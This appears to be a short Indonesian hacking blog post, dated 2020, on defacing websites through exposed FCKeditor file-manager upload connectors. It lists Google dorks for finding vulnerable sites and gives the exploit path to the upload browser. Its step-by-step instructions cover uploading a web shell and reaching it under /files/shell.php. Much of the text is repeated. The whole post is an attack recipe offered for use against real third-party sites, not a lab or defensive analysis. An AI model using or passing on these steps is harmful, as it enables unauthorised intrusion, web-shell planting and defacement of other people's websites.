Deface Poc FCKeditor
Sunday, February 16, 2020
Edit
Dork:
inurl:/assets/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
inurl:/includes/fckeditor/editor/filemanager/connectors/php/upload.php
(use your brains....)
Exploit:
target.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Step by Step:
Dorking pake dork diatas
Pilih salah satu web, kasih exploit /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Jika sudah up shell kalian di form upload yang berada di bawah.
Akses shell? site.com/files/shell.php
inurl:/assets/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
inurl:/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
inurl:/includes/fckeditor/editor/filemanager/connectors/php/upload.php
(use your brains....)
Exploit:
target.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Step by Step:
Dorking pake dork diatas
Jika sudah up shell kalian di form upload yang berada di bawah.
Akses shell? site.com/files/shell.php